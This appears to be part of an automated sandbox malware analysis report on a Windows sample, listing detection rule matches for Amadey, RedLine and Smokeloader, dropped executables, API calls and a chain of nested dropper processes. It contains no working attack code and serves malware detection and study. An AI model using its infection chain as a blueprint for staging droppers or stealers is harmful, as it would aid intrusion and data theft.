Source: 21.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 8.3.D217.exe.e9da20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 29.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 21.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 8.3.D217.exe.e9da20.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 37.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 42.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 29.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 40.2.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 9.3.y4910383.exe.4b9dc20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 22.0.l2956268.exe.af0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 37.0.pdates.exe.1030000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 7.2.g6604988.exe.11a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000025.00000002.602481339.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000025.00000000.599605971.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 0000000C.00000002.908966509.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000016.00000002.482305514.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000028.00000000.725994523.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000007.00000000.468231833.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 0000002A.00000000.854696762.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 0000001D.00000002.483252105.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000015.00000000.476404974.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.420695130.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000000.476570672.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000028.00000002.727223377.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000000.471614340.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 0000001D.00000000.481814915.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000015.00000002.479942590.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 0000002A.00000002.855768212.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00931F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		5_2_00931F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		6_2_00CE1F90

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

Code function: String function: 011B3E00 appears 133 times

Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040151E
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,	0_2_004022D8
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004014F4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014F4
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004032F9 NtTerminateProcess,NtClose,RtlInitUnicodeString,OpenProcessToken,NtOpenProcess,	0_2_004032F9
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004022FD NtQuerySystemInformation,	0_2_004022FD
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014B5
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004026B6 NtEnumerateKey,NtEnumerateKey,NtClose,	0_2_004026B6
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401561
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00402164 NtQuerySystemInformation,	0_2_00402164
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401529
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401534
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_0040153D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040153D
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_0040233F NtQuerySystemInformation,NtQueryInformationProcess,	0_2_0040233F
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004023E1 NtQuerySystemInformation,NtQueryInformationProcess,	0_2_004023E1
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00402188 LocalAlloc,NtQuerySystemInformation,	0_2_00402188
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00402397 NtQuerySystemInformation,NtQueryInformationProcess,	0_2_00402397
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004023B5 NtQuerySystemInformation,NtQueryInformationProcess,	0_2_004023B5
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004023BD NtQuerySystemInformation,NtQueryInformationProcess,	0_2_004023BD

Source: 3448.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 8315 bytes, 2 files, at 0x2c +A "ohcompetitive.exe" +A "ohcompettitive.exe", ID 3668, number 1, 1 datablock, 0x1503 compression
Source: 6F2B.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 252806 bytes, 2 files, at 0x2c +A "x5587928.exe" +A "j8994074.exe", ID 1719, number 1, 13 datablocks, 0x1503 compression
Source: D217.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 252692 bytes, 2 files, at 0x2c +A "y4910383.exe" +A "n7660022.exe", ID 1690, number 1, 13 datablocks, 0x1503 compression
Source: x5587928.exe.5.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 93244 bytes, 2 files, at 0x2c +A "g6604988.exe" +A "h1931339.exe", ID 1685, number 1, 8 datablocks, 0x1503 compression
Source: x5587928.exe.5.dr	Static PE information: Resource name: RT_RCDATA type: DOS executable (COM)
Source: y4910383.exe.8.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 93610 bytes, 2 files, at 0x2c +A "k4215493.exe" +A "l2956268.exe", ID 1689, number 1, 8 datablocks, 0x1503 compression
Source: y4910383.exe.8.dr	Static PE information: Resource name: RT_RCDATA type: DOS executable (COM)

Source: q4B165cujP.exe	Static PE information: No import functions for PE file found
Source: jfshvii.1.dr	Static PE information: No import functions for PE file found

Source: q4B165cujP.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jfshvii.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: q4B165cujP.exe	Static PE information: Section .text
Source: jfshvii.1.dr	Static PE information: Section .text

Source: q4B165cujP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jfshvii

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@68/31@2/8

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_00933FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

5_2_00933FEF

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_00934FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

5_2_00934FE0

Source: q4B165cujP.exe

Virustotal: Detection: 82%

Source: C:\Users\user\Desktop\q4B165cujP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\q4B165cujP.exe C:\Users\user\Desktop\q4B165cujP.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jfshvii C:\Users\user\AppData\Roaming\jfshvii
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6F2B.exe C:\Users\user\AppData\Local\Temp\6F2B.exe
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe
